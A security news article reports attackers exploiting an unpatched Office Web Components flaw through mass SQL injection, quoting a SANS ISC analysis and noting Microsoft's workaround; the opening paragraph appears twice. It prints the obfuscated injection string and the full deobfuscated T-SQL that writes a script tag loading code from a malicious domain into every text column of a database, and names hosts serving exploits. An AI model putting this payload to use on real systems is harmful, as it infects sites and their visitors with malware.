Office Web Components Flaw Used in SQL Injection Attacks

Attackers have begun using the unpatched vulnerability in Microsoft’s Office Web Components in SQL injection attacks. The vulnerability, which only became public this week, affects millions of users running a number of different versions of Windows, Office and Internet Explorer. The SANS Internet Storm Center said it is receiving reports of SQL injection attacks exploiting the vulnerability and using obfuscated code.

Attackers have begun using the unpatched vulnerability in Microsoft’s Office Web Components in SQL injection attacks. The vulnerability, which only became public this week, affects millions of users running a number of different versions of Windows, Office and Internet Explorer. The SANS Internet Storm Center said it is receiving reports of SQL injection attacks exploiting the vulnerability and using obfuscated code.

The attacks on the Office Web Components vulnerability don’t come as a surprise, and follows the typical arc of these tactics. From the SANS ISC blog:

The SQL injection attempt looks very much like the one we’ve been seeing for month – the attacker blindly tries to inject obfuscated SQL code:

‘;DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x44004500430…F007200 AS NVARCHAR(4000));
EXEC(@S);

After deobfuscation of the CAST function input, the following SQL code is revealed:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(‘update [‘+@T+’] set [‘+@C+’]=rtrim(convert(varchar,[‘+@C+’]))+”<script src=hxxp://f1y.in/j.js></script>”’)FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

As you can see, they are injecting a script code pointing to f1y.in, which is a known bad domain. This script contains links to two other web sites (www.jatrja.com and js.tongji.linezing.com) serving malicious JavaScript that, besides exploits for some older vulnerabilities, also include the exploit for the OWC vulnerability.

The exploits end up downloading a Trojan (of course, what else) which currently has pretty bad detection (VT link) – only 15 AV programs detecting it, luckily, some major AV vendors are there.

There is no patch right now for the Office Web Components vulnerability, but Microsoft has released an advisory on the issue, along with instructions on how to implement a workaround. The workaround does not fix the vulnerability, but it prevents the Office Web Components from running in Internet Explorer, which helps prevent attacks against the flaw.

Suggested articles